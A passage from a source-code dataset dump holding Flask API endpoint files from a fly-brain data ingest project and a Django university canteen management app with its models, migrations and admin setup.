apikey, orcid, neuronid):\n out = dict()\n try:\n if valid_user(apikey, orcid):\n n = db.get_neuron(neuronid, orcid=orcid)\n if isinstance(n,dict) and 'error' in n:\n return n\n return marshal(n, neuron), 201\n else:\n out['error'] = {\n \"code\": INVALID_APIKEY,\n \"message\": 'Invalid API Key',\n }\n return out, 403\n except Exception as e:\n print(e)\n out['error'] = {\n \"code\": UNKNOWNERROR,\n \"message\": str(type(e).__name__),\n }\n return out, 403\n"
},
{
"alpha_fraction": 0.6927329897880554,
"alphanum_fraction": 0.6951026916503906,
"avg_line_length": 36.235294342041016,
"blob_id": "215777a291d80933344cdb2e63764372436115c8",
"content_id": "74cba0e552bbd9d7d224f1c0388fd1edafcaa4f7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1266,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 34,
"path": "/vfb_curation_api/api/vfbid/endpoints/neurons.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import logging\n\nfrom flask_restplus import Resource, reqparse\nfrom vfb_curation_api.api.vfbid.serializers import neuron\nfrom vfb_curation_api.api.vfbid.business import valid_user\nfrom vfb_curation_api.api.restplus import api\nfrom vfb_curation_api.database.repository import db\n\n\nlog = logging.getLogger(__name__)\n\nns = api.namespace('neurons', description='Operations related to lists of neurons')\n\n\[email protected]('/')\[email protected](404, 'No neurons found.')\[email protected]('apikey', 'Your API Key', required=True)\[email protected]('orcid', 'Your ORCID', required=True)\[email protected]('datasetid', 'The ID of the dataset the neuron image belongs to.', required=True)\nclass NeuronList(Resource):\n\n @api.marshal_with(neuron, skip_none=True)\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('apikey', type=str, required=True)\n parser.add_argument('datasetid', type=str, required=True)\n parser.add_argument('orcid', type=str, required=True)\n args = parser.parse_args()\n apikey = args['apikey']\n datasetid = args['datasetid']\n orcid = args['orcid']\n if valid_user(apikey, orcid):\n return db.get_all_neurons(orcid=orcid,datasetid=datasetid)\n return \"{ error: 'Invalid API Key' }\"\n"
},
{
"alpha_fraction": 0.720588207244873,
"alphanum_fraction": 0.7239819169044495,
"avg_line_length": 34.31999969482422,
"blob_id": "33123714440cc259a118593e2971943ff8e9dedc",
"content_id": "3fdd6a0a69866861a2be17ff2112614badf776b4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 884,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 25,
"path": "/vfb_curation_api/api/vfbid/endpoints/login.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import logging\n\nfrom flask_restplus import Resource, reqparse\nfrom vfb_curation_api.api.vfbid.serializers import user\nfrom vfb_curation_api.api.restplus import api\nfrom vfb_curation_api.database.repository import db\n\n\nlog = logging.getLogger(__name__)\n\nns = api.namespace('login', description='Authentication')\n\n\[email protected]('/')\[email protected](404, 'User could not be authenticated.')\[email protected]('code','Your ORCID authorisation code')\[email protected]('redirect_uri','The redirect URI with which the original authorisation code request was done.')\nclass Login(Resource):\n @api.marshal_with(user)\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('code', type=str, required=True)\n parser.add_argument('redirect_uri',type=str, required=True)\n args = parser.parse_args()\n return db.authenticate(args['code'],args['redirect_uri'])\n\n"
},
{
"alpha_fraction": 0.5591655373573303,
"alphanum_fraction": 0.5663474798202515,
"avg_line_length": 39.05479431152344,
"blob_id": "a663f207e0bf142e194a9502290361b8eaea7a16",
"content_id": "19b562ebd7c79927e215bf77188225d165a146f2",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2924,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 73,
"path": "/vfb_curation_api/api/vfbid/endpoints/ep_split.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import logging\nfrom flask import request\nfrom flask_restplus import Resource, reqparse, marshal\nfrom vfb_curation_api.api.vfbid.business import create_ep_split, valid_user\nfrom vfb_curation_api.api.vfbid.errorcodes import INVALID_APIKEY, UNKNOWNERROR\nfrom vfb_curation_api.api.vfbid.serializers import list_of_split_drivers, split_driver\nfrom vfb_curation_api.api.vfbid.endpoints.neuron import get_neuron\nfrom vfb_curation_api.api.restplus import api\nfrom vfb_curation_api.database.repository import db\n\nlog = logging.getLogger(__name__)\n\nns = api.namespace('ep_split', description='Operations related to EP/Split')\n\n\[email protected]('/')\[email protected]('apikey', 'Your valid API Key', required=True)\[email protected]('orcid', 'Your ORCID', required=True)\nclass EpSplitResource(Resource):\n\n @api.response(201, 'EP/Split successfully created.')\n @api.expect(list_of_split_drivers)\n def post(self):\n parser = reqparse.RequestParser()\n parser.add_argument('apikey', type=str, required=True)\n parser.add_argument('orcid', type=str, required=True)\n args = parser.parse_args()\n apikey = args['apikey']\n orcid = args['orcid']\n out = dict()\n try:\n if valid_user(apikey, orcid):\n nid = create_ep_split(request.json, orcid, False)\n if isinstance(nid,dict) and 'error' in nid:\n return nid\n else:\n n = db.get_neuron(nid, orcid=orcid)\n print(n)\n if isinstance(n, list) \\\n and any(isinstance(n_result, dict) for n_result in n) \\\n and any(\"error\" in n_result for n_result in n):\n return n, 403\n elif isinstance(n, dict) and 'error' in n:\n return n, 403\n else:\n out['neurons'] = marshal(n, split_driver)\n return out, 201\n else:\n out['error'] = {\n \"code\": INVALID_APIKEY,\n \"message\": 'Invalid API Key',\n }\n return out, 403\n except Exception as e:\n print(e)\n out['error'] = {\n \"code\": UNKNOWNERROR,\n \"message\": str(type(e).__name__),\n }\n return out, 403\n\n @api.param('epsplitid', 'EP/Split id', required=True)\n @api.response(404, 'EP/Split not found.')\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('apikey', type=str, required=True)\n parser.add_argument('epsplitid', type=str, required=True)\n parser.add_argument('orcid', type=str, required=True)\n args = parser.parse_args()\n apikey = args['apikey']\n orcid = args['orcid']\n epsplitid = args['epsplitid']\n return get_neuron(apikey, orcid, epsplitid)\n"
}
] | 27 |
akatsukidev/comedunt
|
https://github.com/akatsukidev/comedunt
|
8ad0960f4d20d3a9dee61021ec1e86225aa4f6e9
|
8d1b4aa31d1f66eb9527e63b016596c3343d3c3f
|
4e77022085efe7550de8f68fa3d3249adb1d9ce0
|
refs/heads/master
| 2016-09-07T04:04:01.874924 | 2014-09-04T05:21:43 | 2014-09-04T05:21:43 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7147738933563232,
"alphanum_fraction": 0.7245005369186401,
"avg_line_length": 32.06956481933594,
"blob_id": "5634a97a53bdb2af2f02c86769a3e3974b505e39",
"content_id": "b8f4923054b57fb4c51bad9bdb24645fe07b8546",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3804,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 115,
"path": "/victor/models.py",
"repo_name": "akatsukidev/comedunt",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\n#Clase que almacena el nivel academico de los comensales\nclass Ciclo(models.Model):\n\tnombre = models.CharField(max_length = 2)\n\tdef __unicode__(self): \n\t\treturn \"%s\" % (self.nombre)\n\n#Clase que almacena las facultades de la universidad\nclass Facultad(models.Model):\n\tnombre = models.CharField(max_length = 140)\n\tdef __unicode__(self): \n\t\treturn \"%s\" % (self.nombre)\n\n#Clase que almacena las escuelas de la universidad\nclass Escuela(models.Model):\n\tnombre = models.CharField(max_length = 140)\n\tfacultad = models.ForeignKey(Facultad)\n\tdef __unicode__(self): \n\t\treturn \"%s - %s\" % (self.nombre, self.facultad.nombre)\n\n#clase que almacena el saldo en soles y en numero de comidas del comensal\nclass Saldo(models.Model):\n\tdinero_soles = models.FloatField()\n\tnum_comidas = models.IntegerField()\n\tdef __unicode__(self): \n\t\treturn \"%s, %s\" % (self.dinero_soles, self.num_comidas)\n\n#clase que almacena los dias de la semana\nclass Dia_Semana(models.Model):\n\tdia = models.CharField(max_length = 10)\n\tdef __unicode__(self): \n\t\treturn \"%s\" % (self.dia)\n\n#clase que almacena el intervalo de dias que el comensal hara uso del servicio\nclass Horario(models.Model):\n\tdia_inicio = models.ForeignKey(Dia_Semana, related_name=\"dia_inicio\")\n\tdia_fin = models.ForeignKey(Dia_Semana, related_name=\"dia_fin\")\n\tdef __unicode__(self): \n\t\treturn \"%s, %s\" % (self.dia_inicio, self.dia_fin)\n\n\n#clase que almacena Fechas en que el comensal no registrar asistencia\nclass Fecha_Roja(models.Model):\n\tdia_inicio = models.DateField(auto_now = False)\n\tdia_fin = models.DateField(auto_now = False)\n\tdef __unicode__(self): \n\t\treturn \"%s, %s\" % (self.dia_inicio, self.dia_fin)\n\n\n#clase que almacena los Horarios de los platos (maniana,tarde, noche)\nclass Horario_Plato(models.Model):\n\tnombre = models.CharField(max_length = 40)\n\tdef __unicode__(self): \n\t\treturn \"%s\" % (self.nombre)\n\n#clase que almacena los platos que se cosinan en el comedor\nclass Plato(models.Model):\n\tnombre = models.CharField(max_length = 40)\n\thorario = models.ForeignKey(Horario_Plato)\n\tdescripcion = models.TextField(max_length = 140)\n\tdef __unicode__(self): \n\t\treturn \"%s\" % (self.nombre)\n\n#clase que almacena las categorias del comensal\nclass Categoria(models.Model):\n\tnombre = models.CharField(max_length = 40)\n\tprecio = models.FloatField()\n\tdescripcion = models.TextField(max_length = 140)\n\tdef __unicode__(self): \n\t\treturn \"%s\" % (self.nombre)\n\n\n#clase que almacena los platos que se cosinan en el comedor\nclass Comensal(models.Model):\n\tnum_matricula = models.CharField(max_length = 40, primary_key=True)\n\tnombre = models.CharField(max_length = 40)\n\tapellidos = models.CharField(max_length = 140)\n\testado = models.BooleanField()\n\tdni = models.CharField(max_length = 9)\n\tdireccion = models.CharField(max_length = 140)\n\tgastos_totales = models.FloatField()\n\t#claves foraneas\n\tescuela = models.ForeignKey(Escuela)\n\tciclo = models.ForeignKey(Ciclo)\n\tcategoria = models.ForeignKey(Categoria)\n\tsaldo = models.ForeignKey(Saldo)\n\tfechas_rojas = models.ForeignKey(Fecha_Roja)\n\thorario = models.ForeignKey(Horario)\n\n\tdef __unicode__(self): \n\t\treturn \"%s %s\" % (self.nombre, self.apellidoPat)\n\n#Clase que almacena las asistencias al comedor\nclass Asistencia(models.Model):\n\tfecha_hora = models.DateTimeField(auto_now = False)\n\testado = models.BooleanField()\n\t#claves foraneas\n\tplato = 
models.ForeignKey(Plato)\n\tcomensal = models.ForeignKey(Comensal)\n\n\tdef __unicode__(self): \n\t\treturn \"%s - %s - %s - %s\" % (self.fecha_hora, self.estado, self.plato, self.comensal)\n\n\n\n\n\n\"\"\"clase que almacena la especialidad de los trabajadores\nclass Especialidad(model,Model):\n\tnombre = models.CharField(max_length = 40)\n\tsalario = models.FloatField()\n\tdescripcion = models.TextField(max_length = 140)\n\tdef __unicode__(self): \n\t\treturn \"%s\" % (self.nombre)\"\"\"\n\n"
},
{
"alpha_fraction": 0.5617561936378479,
"alphanum_fraction": 0.5670633912086487,
"avg_line_length": 51.03765869140625,
"blob_id": "b79263c82858edbe4094ba04145d001a206935ec",
"content_id": "fec5579f46def93307a96cce348b2b63e6e26b93",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12436,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 239,
"path": "/victor/migrations/0001_initial.py",
"repo_name": "akatsukidev/comedunt",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom south.utils import datetime_utils as datetime\nfrom south.db import db\nfrom south.v2 import SchemaMigration\nfrom django.db import models\n\n\nclass Migration(SchemaMigration):\n\n def forwards(self, orm):\n # Adding model 'Ciclo'\n db.create_table(u'victor_ciclo', (\n (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('nombre', self.gf('django.db.models.fields.CharField')(max_length=2)),\n ))\n db.send_create_signal(u'victor', ['Ciclo'])\n\n # Adding model 'Facultad'\n db.create_table(u'victor_facultad', (\n (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('nombre', self.gf('django.db.models.fields.CharField')(max_length=140)),\n ))\n db.send_create_signal(u'victor', ['Facultad'])\n\n # Adding model 'Escuela'\n db.create_table(u'victor_escuela', (\n (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('nombre', self.gf('django.db.models.fields.CharField')(max_length=140)),\n ('facultad', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['victor.Facultad'])),\n ))\n db.send_create_signal(u'victor', ['Escuela'])\n\n # Adding model 'Saldo'\n db.create_table(u'victor_saldo', (\n (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('dinero_soles', self.gf('django.db.models.fields.FloatField')()),\n ('num_comidas', self.gf('django.db.models.fields.IntegerField')()),\n ))\n db.send_create_signal(u'victor', ['Saldo'])\n\n # Adding model 'Dia_Semana'\n db.create_table(u'victor_dia_semana', (\n (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('dia', self.gf('django.db.models.fields.CharField')(max_length=10)),\n ))\n db.send_create_signal(u'victor', ['Dia_Semana'])\n\n # Adding model 'Horario'\n db.create_table(u'victor_horario', (\n (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('dia_inicio', self.gf('django.db.models.fields.related.ForeignKey')(related_name='dia_inicio', to=orm['victor.Dia_Semana'])),\n ('dia_fin', self.gf('django.db.models.fields.related.ForeignKey')(related_name='dia_fin', to=orm['victor.Dia_Semana'])),\n ))\n db.send_create_signal(u'victor', ['Horario'])\n\n # Adding model 'Fecha_Roja'\n db.create_table(u'victor_fecha_roja', (\n (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('dia_inicio', self.gf('django.db.models.fields.DateField')()),\n ('dia_fin', self.gf('django.db.models.fields.DateField')()),\n ))\n db.send_create_signal(u'victor', ['Fecha_Roja'])\n\n # Adding model 'Horario_Plato'\n db.create_table(u'victor_horario_plato', (\n (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('nombre', self.gf('django.db.models.fields.CharField')(max_length=40)),\n ))\n db.send_create_signal(u'victor', ['Horario_Plato'])\n\n # Adding model 'Plato'\n db.create_table(u'victor_plato', (\n (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('nombre', self.gf('django.db.models.fields.CharField')(max_length=40)),\n ('horario', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['victor.Horario_Plato'])),\n ('descripcion', self.gf('django.db.models.fields.TextField')(max_length=140)),\n ))\n db.send_create_signal(u'victor', ['Plato'])\n\n # Adding model 'Categoria'\n db.create_table(u'victor_categoria', (\n (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('nombre', self.gf('django.db.models.fields.CharField')(max_length=40)),\n ('precio', 
self.gf('django.db.models.fields.FloatField')()),\n ('descripcion', self.gf('django.db.models.fields.TextField')(max_length=140)),\n ))\n db.send_create_signal(u'victor', ['Categoria'])\n\n # Adding model 'Comensal'\n db.create_table(u'victor_comensal', (\n ('num_matricula', self.gf('django.db.models.fields.CharField')(max_length=40, primary_key=True)),\n ('nombre', self.gf('django.db.models.fields.CharField')(max_length=40)),\n ('apellidos', self.gf('django.db.models.fields.CharField')(max_length=140)),\n ('estado', self.gf('django.db.models.fields.BooleanField')()),\n ('dni', self.gf('django.db.models.fields.CharField')(max_length=9)),\n ('direccion', self.gf('django.db.models.fields.CharField')(max_length=140)),\n ('escuela', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['victor.Escuela'])),\n ('ciclo', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['victor.Ciclo'])),\n ('categoria', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['victor.Categoria'])),\n ('saldo', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['victor.Saldo'])),\n ('fechas_rojas', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['victor.Fecha_Roja'])),\n ('horario', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['victor.Horario'])),\n ))\n db.send_create_signal(u'victor', ['Comensal'])\n\n # Adding model 'Asistencia'\n db.create_table(u'victor_asistencia', (\n (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('fecha_hora', self.gf('django.db.models.fields.DateTimeField')()),\n ('estado', self.gf('django.db.models.fields.BooleanField')()),\n ('plato', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['victor.Plato'])),\n ('comensal', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['victor.Comensal'])),\n ))\n db.send_create_signal(u'victor', ['Asistencia'])\n\n\n def backwards(self, orm):\n # Deleting model 'Ciclo'\n db.delete_table(u'victor_ciclo')\n\n # Deleting model 'Facultad'\n db.delete_table(u'victor_facultad')\n\n # Deleting model 'Escuela'\n db.delete_table(u'victor_escuela')\n\n # Deleting model 'Saldo'\n db.delete_table(u'victor_saldo')\n\n # Deleting model 'Dia_Semana'\n db.delete_table(u'victor_dia_semana')\n\n # Deleting model 'Horario'\n db.delete_table(u'victor_horario')\n\n # Deleting model 'Fecha_Roja'\n db.delete_table(u'victor_fecha_roja')\n\n # Deleting model 'Horario_Plato'\n db.delete_table(u'victor_horario_plato')\n\n # Deleting model 'Plato'\n db.delete_table(u'victor_plato')\n\n # Deleting model 'Categoria'\n db.delete_table(u'victor_categoria')\n\n # Deleting model 'Comensal'\n db.delete_table(u'victor_comensal')\n\n # Deleting model 'Asistencia'\n db.delete_table(u'victor_asistencia')\n\n\n models = {\n u'victor.asistencia': {\n 'Meta': {'object_name': 'Asistencia'},\n 'comensal': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Comensal']\"}),\n 'estado': ('django.db.models.fields.BooleanField', [], {}),\n 'fecha_hora': ('django.db.models.fields.DateTimeField', [], {}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'plato': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Plato']\"})\n },\n u'victor.categoria': {\n 'Meta': {'object_name': 'Categoria'},\n 'descripcion': ('django.db.models.fields.TextField', [], {'max_length': '140'}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'nombre': ('django.db.models.fields.CharField', [], {'max_length': 
'40'}),\n 'precio': ('django.db.models.fields.FloatField', [], {})\n },\n u'victor.ciclo': {\n 'Meta': {'object_name': 'Ciclo'},\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'nombre': ('django.db.models.fields.CharField', [], {'max_length': '2'})\n },\n u'victor.comensal': {\n 'Meta': {'object_name': 'Comensal'},\n 'apellidos': ('django.db.models.fields.CharField', [], {'max_length': '140'}),\n 'categoria': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Categoria']\"}),\n 'ciclo': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Ciclo']\"}),\n 'direccion': ('django.db.models.fields.CharField', [], {'max_length': '140'}),\n 'dni': ('django.db.models.fields.CharField', [], {'max_length': '9'}),\n 'escuela': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Escuela']\"}),\n 'estado': ('django.db.models.fields.BooleanField', [], {}),\n 'fechas_rojas': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Fecha_Roja']\"}),\n 'horario': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Horario']\"}),\n 'nombre': ('django.db.models.fields.CharField', [], {'max_length': '40'}),\n 'num_matricula': ('django.db.models.fields.CharField', [], {'max_length': '40', 'primary_key': 'True'}),\n 'saldo': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Saldo']\"})\n },\n u'victor.dia_semana': {\n 'Meta': {'object_name': 'Dia_Semana'},\n 'dia': ('django.db.models.fields.CharField', [], {'max_length': '10'}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})\n },\n u'victor.escuela': {\n 'Meta': {'object_name': 'Escuela'},\n 'facultad': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Facultad']\"}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'nombre': ('django.db.models.fields.CharField', [], {'max_length': '140'})\n },\n u'victor.facultad': {\n 'Meta': {'object_name': 'Facultad'},\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'nombre': ('django.db.models.fields.CharField', [], {'max_length': '140'})\n },\n u'victor.fecha_roja': {\n 'Meta': {'object_name': 'Fecha_Roja'},\n 'dia_fin': ('django.db.models.fields.DateField', [], {}),\n 'dia_inicio': ('django.db.models.fields.DateField', [], {}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})\n },\n u'victor.horario': {\n 'Meta': {'object_name': 'Horario'},\n 'dia_fin': ('django.db.models.fields.related.ForeignKey', [], {'related_name': \"'dia_fin'\", 'to': u\"orm['victor.Dia_Semana']\"}),\n 'dia_inicio': ('django.db.models.fields.related.ForeignKey', [], {'related_name': \"'dia_inicio'\", 'to': u\"orm['victor.Dia_Semana']\"}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})\n },\n u'victor.horario_plato': {\n 'Meta': {'object_name': 'Horario_Plato'},\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'nombre': ('django.db.models.fields.CharField', [], {'max_length': '40'})\n },\n u'victor.plato': {\n 'Meta': {'object_name': 'Plato'},\n 'descripcion': ('django.db.models.fields.TextField', [], {'max_length': '140'}),\n 'horario': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Horario_Plato']\"}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'nombre': ('django.db.models.fields.CharField', [], {'max_length': '40'})\n },\n u'victor.saldo': 
{\n 'Meta': {'object_name': 'Saldo'},\n 'dinero_soles': ('django.db.models.fields.FloatField', [], {}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'num_comidas': ('django.db.models.fields.IntegerField', [], {})\n }\n }\n\n complete_apps = ['victor']"
},
{
"alpha_fraction": 0.8291139006614685,
"alphanum_fraction": 0.8291139006614685,
"avg_line_length": 25.33333396911621,
"blob_id": "9fd8cdb62feed7596dc8c9bbbf6382b93ab77106",
"content_id": "50cb3091ee123ba1abb18ba8ac04636b50a8873a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 158,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 6,
"path": "/victor/views.py",
"repo_name": "akatsukidev/comedunt",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.http import HttpResponse,HttpResponseRedirect\n\n\ndef home(request):\n\treturn HttpResponse(\"Pantalla de Inicio\")\n"
},
{
"alpha_fraction": 0.5284024477005005,
"alphanum_fraction": 0.5342328548431396,
"avg_line_length": 55.11214828491211,
"blob_id": "1654f94e254db0dd218784bb7880b3628cc26bce",
"content_id": "f37c6aa5db437ba9dadec2ae4a647f876ef68574",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6003,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 107,
"path": "/victor/migrations/0002_auto__add_field_comensal_gastos_totales.py",
"repo_name": "akatsukidev/comedunt",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom south.utils import datetime_utils as datetime\nfrom south.db import db\nfrom south.v2 import SchemaMigration\nfrom django.db import models\n\n\nclass Migration(SchemaMigration):\n\n def forwards(self, orm):\n # Adding field 'Comensal.gastos_totales'\n db.add_column(u'victor_comensal', 'gastos_totales',\n self.gf('django.db.models.fields.FloatField')(default=0),\n keep_default=False)\n\n\n def backwards(self, orm):\n # Deleting field 'Comensal.gastos_totales'\n db.delete_column(u'victor_comensal', 'gastos_totales')\n\n\n models = {\n u'victor.asistencia': {\n 'Meta': {'object_name': 'Asistencia'},\n 'comensal': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Comensal']\"}),\n 'estado': ('django.db.models.fields.BooleanField', [], {}),\n 'fecha_hora': ('django.db.models.fields.DateTimeField', [], {}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'plato': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Plato']\"})\n },\n u'victor.categoria': {\n 'Meta': {'object_name': 'Categoria'},\n 'descripcion': ('django.db.models.fields.TextField', [], {'max_length': '140'}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'nombre': ('django.db.models.fields.CharField', [], {'max_length': '40'}),\n 'precio': ('django.db.models.fields.FloatField', [], {})\n },\n u'victor.ciclo': {\n 'Meta': {'object_name': 'Ciclo'},\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'nombre': ('django.db.models.fields.CharField', [], {'max_length': '2'})\n },\n u'victor.comensal': {\n 'Meta': {'object_name': 'Comensal'},\n 'apellidos': ('django.db.models.fields.CharField', [], {'max_length': '140'}),\n 'categoria': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Categoria']\"}),\n 'ciclo': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Ciclo']\"}),\n 'direccion': ('django.db.models.fields.CharField', [], {'max_length': '140'}),\n 'dni': ('django.db.models.fields.CharField', [], {'max_length': '9'}),\n 'escuela': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Escuela']\"}),\n 'estado': ('django.db.models.fields.BooleanField', [], {}),\n 'fechas_rojas': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Fecha_Roja']\"}),\n 'gastos_totales': ('django.db.models.fields.FloatField', [], {}),\n 'horario': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Horario']\"}),\n 'nombre': ('django.db.models.fields.CharField', [], {'max_length': '40'}),\n 'num_matricula': ('django.db.models.fields.CharField', [], {'max_length': '40', 'primary_key': 'True'}),\n 'saldo': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Saldo']\"})\n },\n u'victor.dia_semana': {\n 'Meta': {'object_name': 'Dia_Semana'},\n 'dia': ('django.db.models.fields.CharField', [], {'max_length': '10'}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})\n },\n u'victor.escuela': {\n 'Meta': {'object_name': 'Escuela'},\n 'facultad': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Facultad']\"}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'nombre': ('django.db.models.fields.CharField', [], {'max_length': '140'})\n },\n u'victor.facultad': {\n 'Meta': {'object_name': 'Facultad'},\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '140'})\n },\n u'victor.fecha_roja': {\n 'Meta': {'object_name': 'Fecha_Roja'},\n 'dia_fin': ('django.db.models.fields.DateField', [], {}),\n 'dia_inicio': ('django.db.models.fields.DateField', [], {}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})\n },\n u'victor.horario': {\n 'Meta': {'object_name': 'Horario'},\n 'dia_fin': ('django.db.models.fields.related.ForeignKey', [], {'related_name': \"'dia_fin'\", 'to': u\"orm['victor.Dia_Semana']\"}),\n 'dia_inicio': ('django.db.models.fields.related.ForeignKey', [], {'related_name': \"'dia_inicio'\", 'to': u\"orm['victor.Dia_Semana']\"}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})\n },\n u'victor.horario_plato': {\n 'Meta': {'object_name': 'Horario_Plato'},\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'nombre': ('django.db.models.fields.CharField', [], {'max_length': '40'})\n },\n u'victor.plato': {\n 'Meta': {'object_name': 'Plato'},\n 'descripcion': ('django.db.models.fields.TextField', [], {'max_length': '140'}),\n 'horario': ('django.db.models.fields.related.ForeignKey', [], {'to': u\"orm['victor.Horario_Plato']\"}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'nombre': ('django.db.models.fields.CharField', [], {'max_length': '40'})\n },\n u'victor.saldo': {\n 'Meta': {'object_name': 'Saldo'},\n 'dinero_soles': ('django.db.models.fields.FloatField', [], {}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'num_comidas': ('django.db.models.fields.IntegerField', [], {})\n }\n }\n\n complete_apps = ['victor']"
},
{
"alpha_fraction": 0.8181818127632141,
"alphanum_fraction": 0.8181818127632141,
"avg_line_length": 23.58823585510254,
"blob_id": "b98a42c001e42b7d7799b51c61597019cdc23ebf",
"content_id": "d3ec1d790c48363b75d90e64850c93ad7863261f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 418,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 17,
"path": "/victor/admin.py",
"repo_name": "akatsukidev/comedunt",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\nfrom models import *\n\n\nadmin.site.register(Saldo)\nadmin.site.register(Dia_Semana)\nadmin.site.register(Horario)\nadmin.site.register(Fecha_Roja)\nadmin.site.register(Horario_Plato)\nadmin.site.register(Plato)\nadmin.site.register(Categoria)\nadmin.site.register(Comensal)\nadmin.site.register(Asistencia)\nadmin.site.register(Ciclo)\nadmin.site.register(Facultad)\nadmin.site.register(Escuela)\n"
}
] | 5 |
